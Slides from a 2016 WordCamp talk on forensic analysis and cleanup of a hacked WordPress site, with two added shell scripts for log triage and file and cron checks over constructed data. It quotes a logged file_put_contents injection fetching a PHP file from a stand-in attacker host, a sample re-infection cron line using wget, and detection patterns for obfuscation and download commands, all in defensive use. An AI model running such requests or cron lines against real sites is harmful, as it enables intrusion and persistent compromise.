Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
1. Post-Mortem of a Hacked Website
Presented By: Tim Butler – Conetix
WordCamp Sunshine Coast 2016
Twitter: @timbutler
2. Who Am I?
Tim Butler
Enterprise Manager – Conetix
● 5 years in the hosting industry
● Previous - IT Security Manager within Federal Government
● Using WordPress since 2005
● Clean-up 2-5 hacked websites a week
3. In this talk…
➔What happens when you’re hacked
➔Deep Analysis
➔Clean Up
➔Prevention
4. But before we start…
Prevention is better than the cure
Backup Backup Backup!
(and then take another backup)
6. How do you know if you’ve been hacked?
• Used to be simple (but annoying) defacing
• Poor site performance
• Emails bouncing
• Google was nice enough to let you know
8. Why was I hacked?
• You probably weren’t targeted specifically
• DoS attacks
• Phishing
• Spam
• Bot to hack other sites
9. Why was I hacked?
Google discovers over 100,000 infected sites per month
100 billion estimated cost of cybercrime
10. So… I’ve been hacked
• Hackers want to have the system exploited for as long as possible
• Many exploits avoid Google / Chrome to remain undetected
• Obfuscated code
• Self morphing code
11. So… I’ve been hacked
Basically, it’s one big game of cat and mouse
Source: simpsons.wikia.com
17. Step 1: Don’t Touch Anything
Treat it like a crime scene
You need to preserve the digital forensics
18. Step 1: Don’t Touch Anything
• Webserver log files
• Server log files
• File timestamps
• Talk to your host!
Most important part is to find the point of origin
19. Step 1: Don’t Touch Anything
If you need your website back up immediately, restore your most recent backup to a new hosting subscription and update DNS
25. Step 2: Forensic Analysis
Reality
• Lots of digging through log files
• Lots of cross-referencing file modification times
• Lots of low-level, tech work
27. Step 2: Forensic Analysis
Access Log Files
• First item to check
• Look for suspicious POST calls
• Looking for the result of the hack to start with, not the cause
28. Step 2: Forensic Analysis
POST Calls
• Need to sort the good from the bad
grep POST access_log | wc -l
• 1,412 results
What to look for
Where to look for it
Quickly count the results
33. Step 2: Forensic Analysis
File Creation / Modification Times
• We know the malicious file is
wp-content/plugins/legit-looking/plugin/safefile.php
• Let’s look at the modification time:
ls -l safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Mar 23 2013 safefile.php
• Also check the creation time:
34. Step 2: Forensic Analysis
File Creation / Modification Times
• Also check the creation time:
ls -lc safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Apr 18 02:45 safefile.php
• Dates can be manipulated! Here’s where we need to search
35. Step 2: Forensic Analysis
Recheck Access Logs
grep -F "[18/Apr/2016:02:45" access_log
(-F is needed: without it grep reads the leading [ as an unterminated bracket expression and refuses the pattern)
This may give us something like:
xxx.xxx.xxx.xxx - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2Fhackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
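The log-triage steps of slides 28 to 35, as an added shell example that is not from the talk or from Conetix: it builds a constructed access_log (made-up IPs and times; the injected request copies the one on the slide), counts the POSTs, pulls the requests logged in the minute that ls -lc gave for the dropped file, decodes the query string and flags the lines worth reading first. It assumes only POSIX sh, grep, awk and mktemp, and runs offline.

```shell
#!/bin/sh
# Added example (not from the talk): the access-log part of Step 2 as a small
# triage script run over a CONSTRUCTED access_log. IPs, times and paths are
# made up; the injected request mirrors the one shown on the slides.
set -eu

LOG="$(mktemp)"
trap 'rm -f "$LOG"' EXIT
cat > "$LOG" <<'EOF'
203.0.113.10 - - [18/Apr/2016:02:44:58 +1000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2Fhackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
198.51.100.7 - - [18/Apr/2016:02:45:09 +1000] "POST /wp-content/plugins/legit-looking/plugin/safefile.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.22 - - [18/Apr/2016:02:46:11 +1000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.22 - - [18/Apr/2016:02:47:30 +1000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 44 "-" "Mozilla/5.0"
EOF

# Slide 28: how many POST requests are there to sort through?
count_posts() { grep -c '"POST ' "$LOG"; }

# Slide 35: every request logged in the minute that `ls -lc` (ctime, the inode
# change time; the slides call it creation time) gave for the malicious file.
# Argument format: 18/Apr/2016:02:45. -F stops grep reading '[' as a bracket
# expression, which is why the bare pattern on the slide errors out.
requests_at() { grep -F "[$1" "$LOG"; }

# Decode %XX escapes so the injected argument reads as the attacker wrote it.
urldecode() {
  awk 'BEGIN { for (i = 0; i < 256; i++) h[sprintf("%02X", i)] = sprintf("%c", i) }
       { s = $0; out = ""
         while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
           out = out substr(s, 1, RSTART - 1) h[toupper(substr(s, RSTART + 1, 2))]
           s = substr(s, RSTART + 3)
         }
         print out s }'
}

# Requests whose query string hands a PHP function name to the server, as the
# robo-gallery request did. Any of these in a query string deserves a look.
suspicious_requests() {
  grep -Ei '\?[^" ]*(file_put_contents|eval|base64_decode|system|shell_exec)' "$LOG"
}

# POSTs to PHP files outside WordPress's normal entry points. The allowlist is a
# starting point, not a complete one; here it isolates the POST to safefile.php.
odd_posts() {
  grep '"POST ' "$LOG" \
    | grep -Ev '"POST /(wp-login\.php|wp-admin/|xmlrpc\.php|wp-cron\.php|wp-comments-post\.php)'
}

printf 'POST requests to triage: %s\n' "$(count_posts)"
printf '\nRequests in the minute the file appeared:\n'; requests_at 18/Apr/2016:02:45
printf '\nQuery strings naming PHP functions (decoded):\n'; suspicious_requests | urldecode
printf '\nPOSTs to PHP outside the usual entry points:\n'; odd_posts
```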
40. Step 3: The Clean Up
If there are no backups…
• 10x as much work
• Hackers love to leave backdoors to regain access
41. Step 3: The Clean Up
Remove infected files
• Malicious files
• Look for other files
They can modify every other file in your site
42. Step 3: The Clean Up
Check for Database changes
• Inserted users
• Updated passwords / privileges for non-admin users
43. Step 3: The Clean Up
Cron Jobs
• Scheduled re-infections
• Check your web control panel / raw cron
44. Step 3: The Clean Up
RBL Blacklists
• If you were spamming, automated systems notice
• Use an RBL lookup to check
- Senderbase (used by Telstra / Optus etc) doesn’t allow you to automate scans
- Nor does Hotmail / Outlook / Office365 / Google
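The "look for other files", forged-timestamp and cron checks from slides 33, 41 and 43, as an added shell example that is not the talk's own material: it builds a throwaway WordPress-like tree with inert marker files, backdates one with touch to reproduce the slide's 2013 mtime, and shows which checks still catch it. The last-good-deploy date and the crontab text are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from the talk): the "look for other files", timestamp and
# cron checks of Steps 2 and 3 run over a CONSTRUCTED throwaway site tree.
# File contents are inert markers, not real malware.
set -eu

SITE="$(mktemp -d)"
trap 'rm -rf "$SITE"' EXIT
mkdir -p "$SITE/wp-includes" "$SITE/wp-content/uploads/2016/04" \
         "$SITE/wp-content/plugins/legit-looking/plugin"
printf '<?php\nrequire_once "load.php";\n' > "$SITE/wp-includes/functions.php"
printf '<?php\necho "ok";\n' > "$SITE/wp-content/plugins/legit-looking/plugin/index.php"
printf '<?php eval(base64_decode("PLACEHOLDER"));\n' > "$SITE/wp-content/uploads/2016/04/image.php"
printf '<?php $d = gzinflate(base64_decode("PLACEHOLDER"));\n' \
  > "$SITE/wp-content/plugins/legit-looking/plugin/safefile.php"
# Slide 33 in miniature: the attacker backdates the dropped file's mtime. touch
# can do that; it cannot backdate ctime, which stays at the real drop time.
touch -t 201303230000 "$SITE/wp-content/plugins/legit-looking/plugin/safefile.php"
# Reference point: the last known-good deploy (assumed date, not from the talk).
touch -t 201601010000 "$SITE/.last_good_deploy"

# WordPress stores media under uploads; PHP there is a classic dropper sign.
php_in_uploads() { find "$SITE/wp-content/uploads" -type f -name '*.php' | sort; }

# Files using the usual obfuscation primitives. Legitimate plugins call
# base64_decode too, so this is a reading list, not a verdict.
obfuscated_php() {
  find "$SITE" -type f -name '*.php' \
    -exec grep -lE 'eval\(|base64_decode\(|gzinflate\(|str_rot13\(' {} + | sort
}

# Files whose mtime predates the last good deploy but whose ctime is recent:
# the mtime was forged. In this throwaway tree every ctime is "now", so only
# the backdated file stands out; on a real server old files have old ctimes.
forged_mtime() {
  find "$SITE" -type f -name '*.php' -ctime -1 ! -newer "$SITE/.last_good_deploy" | sort
}

# Slide 43: scheduled re-infection. Constructed crontab text; the only real
# thing about it is the shape of the entry to look for.
CRON='# constructed crontab
0 3 * * * /usr/bin/php /var/www/html/wp-cron.php
*/10 * * * * wget -q -O /var/www/html/wp-content/uploads/x.php http://hackerssite/scripts/safefile.php
30 1 * * 0 /usr/local/bin/backup.sh'
suspicious_cron() {
  printf '%s\n' "$CRON" | grep -v '^#' \
    | grep -E '(wget|curl) |/tmp/|/dev/shm/|base64'
}

printf 'PHP under uploads:\n';         php_in_uploads
printf '\nObfuscation markers:\n';     obfuscated_php
printf '\nForged mtime:\n';            forged_mtime
printf '\nCron entries to review:\n';  suspicious_cron
```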
50. Step 4: Prevention
Keep your software up-to-date
• One gotcha to be aware of:
Paid Themes with Plugins
- may not auto update
- may require an active subscription
• Remove (don’t just disable) unused themes / plugins
51. Step 4: Prevention
Secure Passwords
• Unique password per site / login
• Use a password manager
• Length is more important than complexity (12+ characters is good)
53. Step 4: Prevention
Server / Hosting Protection
• CloudFlare Pro / Web Application Firewall
• Limit each site to one user
• Don’t keep old directories / backups on the server